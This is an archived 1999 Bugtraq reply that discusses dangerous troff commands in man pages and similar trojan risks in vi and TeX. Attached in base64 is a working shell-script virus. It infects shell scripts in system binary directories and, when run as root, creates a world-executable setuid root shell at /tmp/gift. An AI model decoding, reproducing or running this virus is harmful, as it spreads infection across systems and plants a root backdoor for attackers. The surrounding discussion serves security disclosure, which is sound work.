[11133] in bugtraq
Re: Troff dangerous.
daemon@ATHENA.MIT.EDU (Pete)
Mon Jul 26 21:57:49 1999
Mime-Version: 1.0
Content-Type: multipart/mixed; boundary="----- =_aaaaaaaaaa0"
Content-Id: <28766.932950763.0@kizmiaz.dis.org>
Message-Id: <199907260059.RAA28770@kizmiaz.dis.org>
Date: Sun, 25 Jul 1999 17:59:23 -0700
Reply-To: Pete <shipley@DIS.ORG>
From: Pete <shipley@DIS.ORG>
X-To: BUGTRAQ@securityfocus.com
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: Your message of Sun, 25 Jul 1999 17:33:37 +0200.
<19990725173337.A2181@hades.chaoz.org>
------- =_aaaaaaaaaa0
Content-Type: text/plain; charset="us-ascii"
Content-ID: <28766.932950763.1@kizmiaz.dis.org>
>On Fri, Jul 23, 1999 at 10:16:42PM +0200, Pawel Wilk wrote:
>>
>> If you want your system safe,
>> don't look as root
>> at manual page.
>
>Don't look at them _at_all_ before checking them for dangerous troff-commands
>I'd say. In the end of my message I have included the shellfunction I use to
>check manual pages before installing them / viewing them..
>
>What this also means is SGID man is probably not a good idea (a method that is
>used to avoid having the preformatted manualpage cache, catman, directories
>worldwriteable).
<RANT>
This is not a *new* security problem, thus has been known for
decades and ranks with trojan in VI and TeX and sh shell ( I will
attach a sh shell virus
I believe it was Spafford that published a worm or virus written in TeX
but I can't locate it in my security archives at the moment. I am sure
someone on this list has a copy.
Also in VI it is/was (depending on your system and which version of VI you
have installed) possible to have arbitrary commands executed as the file
was edited.
I believe the syntax was
#exec <command>
and it had to be one of the first five lines in the file
Thus you would update your warning to be:
when root dont edit files, read man pages or print TeX documents
or run commands.
Also don't forget to have set messages to off so people can't bounce
command off your terminals status line (aka: the "25th" line)
</RANT>
But as for your statement I would prefer a setuid/gid man (to a dedicated
uid and gid) thus *when* your troff is compromised. It will not have the
authority to compromise your system.
------- =_aaaaaaaaaa0
Content-Type: plain/text
Content-ID: <28766.932950763.2@kizmiaz.dis.org>
Content-Description: sh virus
Content-Transfer-Encoding: base64
IyEgL2Jpbi9zaAooICAgZm9yIGkgaW4gKiAvYmluLyogL3Vzci9iaW4vKiAvdXNyL3VjYi8qIC91
c3IvbmV3LyoKICAgIGRvICBpZiBzZWQgMXEgJGkgfCBncmVwICdeIyFbICAgICAgICBdKi9iaW4v
c2gnCiAgICAgICAgdGhlbiBpZiBncmVwICdeIyBtYXJrJCcgJGkKICAgICAgICAgICAgdGhlbiA6
CiAgICAgICAgICAgIGVsc2UgdHJhcCAicm0gLWYgL3RtcC8kJCIgMCAxIDIgMTMgMTUKICAgICAg
ICAgICAgICAgIHNlZCAxcSAkaSA+IC90bXAvJCQKICAgICAgICAgICAgICAgIHNlZCAnMWQKICAg
ICAgICAgICAgICAgICAgICAvXiMgbWFyayQvcScgJDAgPj4gL3RtcC8kJAogICAgICAgICAgICAg
ICAgc2VkIDFkICRpID4+IC90bXAvJCQKICAgICAgICAgICAgICAgIGNwIC90bXAvJCQgJGkKICAg
ICAgICAgICAgZmkKICAgICAgICBmaQogICAgZG9uZQogICAgaWYgbHMgLWwgL3RtcC8kJCB8IGdy
ZXAgcm9vdAogICAgdGhlbiBybSAvdG1wL2dpZnQKICAgICAgICAgY3AgL2Jpbi9zaCAvdG1wL2dp
ZnQKICAgICAgICAgY2htb2QgNDc3NyAvdG1wL2dpZnQKICAgICAgICAgZWNobyBnaWZ0IHwgbWFp
bCByb290QGxvY2FsaG9zdAogICAgZmkKICAgIHJtIC90bXAvJCQKKSA+L2Rldi9udWxsIDI+L2Rl
di9udWxsICYKI21hcmsKCgoK
------- =_aaaaaaaaaa0--
